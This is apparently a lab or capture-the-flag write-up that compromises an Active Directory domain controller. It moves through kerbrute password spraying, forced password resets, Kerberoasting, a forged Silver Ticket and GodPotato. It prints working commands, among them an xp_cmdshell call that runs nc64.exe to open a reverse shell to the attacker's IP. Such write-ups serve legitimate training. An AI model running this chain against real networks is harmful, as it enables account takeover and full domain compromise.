Enumeration

Nmap

The initial nmap scan revealed the ports typical of a domain controller (DNS, Kerberos, LDAP, SMB and so on).

[screenshot: nmap scan output]

I added the necessary hostnames (the domain and the DC) to /etc/hosts.

[screenshot: /etc/hosts entries]

Web Enumeration

The website listed many names, which I collected as input for user enumeration.

[screenshot: website listing names]

Exploitation

User Enumeration

Using username-anarchy, I turned those names into a list of candidate usernames.

[screenshot: generated user list]

Then I ran kerbrute's user enumeration against that list and noted the usernames that the KDC confirmed as valid.

[screenshot: kerbrute valid usernames]
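As an added example (my own code, not part of the original write-up and not username-anarchy's implementation), the following Python builds the same kind of candidate list from a set of names. The format set is an assumption modelled on the common username-anarchy styles; the sample names are the three users that appear in this write-up plus one constructed entry with an apostrophe to show how punctuation is normalised.

```python
import re

# Assumed username styles (first.last, flast, f.last, ...). This is a
# hand-picked set modelled on username-anarchy, not the tool's own list.
FORMATS = (
    "{first}",
    "{last}",
    "{first}.{last}",
    "{first}{last}",
    "{f}{last}",
    "{f}.{last}",
    "{first}{l}",
    "{first}_{last}",
    "{last}.{first}",
    "{last}{first}",
    "{l}{first}",
    "{last}{f}",
)


def _clean(token: str) -> str:
    """Lower-case one name part and drop anything outside [a-z0-9] (O'Brien -> obrien)."""
    return re.sub(r"[^a-z0-9]", "", token.lower())


def candidate_usernames(full_name: str) -> list[str]:
    """Expand one 'First [Middle] Last' string into candidate sAMAccountNames."""
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if not parts:
        return []
    if len(parts) == 1:          # mononym: nothing to combine
        return parts
    first, last = parts[0], parts[-1]      # middle names are ignored
    fields = {"first": first, "last": last, "f": first[0], "l": last[0]}
    out: list[str] = []
    for fmt in FORMATS:
        user = fmt.format(**fields)
        if user not in out:                 # dedupe, keep format order
            out.append(user)
    return out


def build_user_list(names: list[str]) -> list[str]:
    """Merge candidates for all names, removing duplicates across names."""
    seen: set[str] = set()
    out: list[str] = []
    for name in names:
        for user in candidate_usernames(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


# Sample input: three names from this write-up plus one constructed entry.
SAMPLE_NAMES = ["Andrea Hayes", "Iain White", "Christopher Lewis", "Mary O'Brien"]

if __name__ == "__main__":
    # Print one username per line, ready to feed to kerbrute userenum.
    for user in build_user_list(SAMPLE_NAMES):
        print(user)
```

The output is one username per line, so it can be fed directly to kerbrute's userenum; kerbrute only needs the sAMAccountName, and because Kerberos pre-authentication errors differ for unknown and known principals the check is silent from the account's point of view (no failed-logon event, no lockout counter).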

Password Spraying

I tried many techniques and none of them worked. Then I noticed that the website was created in 2023.

[screenshot: website showing 2023]

So I built a wordlist from the site with cewl and then appended 2022, 2023 and ! to each word with the loop below (the ! is single-quoted so that an interactive shell does not treat it as history expansion).

while read -r w; do printf '%s\n' "$w" "${w}2022" "${w}2023" "${w}"'!'; done < password > pass.txt

Then I sprayed those candidates with kerbrute and found a valid set of credentials.

[screenshot: kerbrute valid credentials]

BloodHound

With those credentials I collected domain data using bloodhound-python.

bloodhound-python -u 'andrea.hayes' -p 'Nagoya2023' -c all -ns 192.168.224.21 -d nagoya-industries.com --zip

[screenshot: bloodhound-python collection]

BloodHound revealed a path of two ForceChangePassword edges ending at a user who can log in over WinRM.

[screenshot: BloodHound attack path]

I exercised each ForceChangePassword edge with Samba's net rpc password. Resetting a password is destructive (the original value is lost and the user is locked out), so record every account you change. The second hop, resetting CHRISTOPHER.LEWIS while authenticated as iain.white, is shown below.

net rpc password "CHRISTOPHER.LEWIS" "Test1234." -U "nagoya-industries.com"/"iain.white"%"Test1234." -S "192.168.224.21"

[screenshot: password change succeeded]

With the new password I obtained a WinRM shell as CHRISTOPHER.LEWIS and read the user flag.

[screenshot: user flag]

Privilege Escalation

Kerberoasting

Next I Kerberoasted the domain with impacket-GetUserSPNs, requesting a service ticket for every account that has an SPN.

impacket-GetUserSPNs nagoya-industries.com/'CHRISTOPHER.LEWIS':'Test1234.' -request

[screenshot: GetUserSPNs output]

The ticket for svc_mssql cracked offline, giving me that account's password.

[screenshot: cracked svc_mssql password]

MSSQL Service

At first I tried many methods but found nothing useful. Then I noticed that an MSSQL service was running on the host but was not reachable from outside.

[screenshot: MSSQL listening locally]

I tried to exploit it locally with PowerUpSQL, without success.

Instead I set up ligolo-ng as follows to reach the local MSSQL service.

  1. I started the ligolo-ng proxy on my attacking machine.

[screenshot: ligolo-ng proxy]

  2. I ran agent.exe on the target so that it connected back to the proxy.

[screenshot: ligolo-ng agent]

With that tunnel in place I was able to log in to MSSQL. To reach the service I pointed the hostname in /etc/hosts at 240.0.0.1, the ligolo-ng address that maps to the agent's own loopback interface (127.0.0.1).

[screenshot: MSSQL login]

Silver Ticket

However, the svc_mssql login had no useful permissions: no linked servers and no impersonation rights. Because I held the service account's password, I could forge a Silver Ticket. A service ticket is encrypted with the service account's key and the service does not consult the DC when accepting it, so a ticket forged with that key lets me present myself to MSSQL as Administrator.

  1. Generate the NT hash of the service account's password.

[screenshot: NT hash of svc_mssql]

  2. Create a ticket for Administrator with impacket-ticketer.
impacket-ticketer -nthash "E3A0168BC21CFB88B95C954A5B18F57C" -domain-sid "S-1-5-21-1969309164-1513403977-1686805993" -spn "MSSQL/nagoya.nagoya-industries.com"  -domain "nagoya-industries.com" -user-id 500 "Administrator"

[screenshot: ticketer output]

  3. Point KRB5CCNAME at the ticket and log in to MSSQL as Administrator.
KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k nagoya.nagoya-industries.com

[screenshot: MSSQL login as Administrator]

xp_cmdshell

From the Administrator MSSQL session I ran xp_cmdshell (enable it first with mssqlclient's enable_xp_cmdshell if it is turned off) to launch nc64.exe, staged earlier in C:\temp, and catch a reverse shell.

EXEC xp_cmdshell 'cmd /c C:\temp\nc64.exe 192.168.45.216 445 -e cmd.exe'

That gave me a shell on the host.

[screenshot: reverse shell]

SeImpersonatePrivilege (GodPotato)

The shell ran in the context of the MSSQL service account, which holds SeImpersonatePrivilege. I downloaded GodPotato (BeichenDream/GodPotato) and ran it to obtain a reverse shell as SYSTEM.

[screenshot: GodPotato SYSTEM shell]

Then I read the Administrator flag.

[screenshot: Administrator flag]

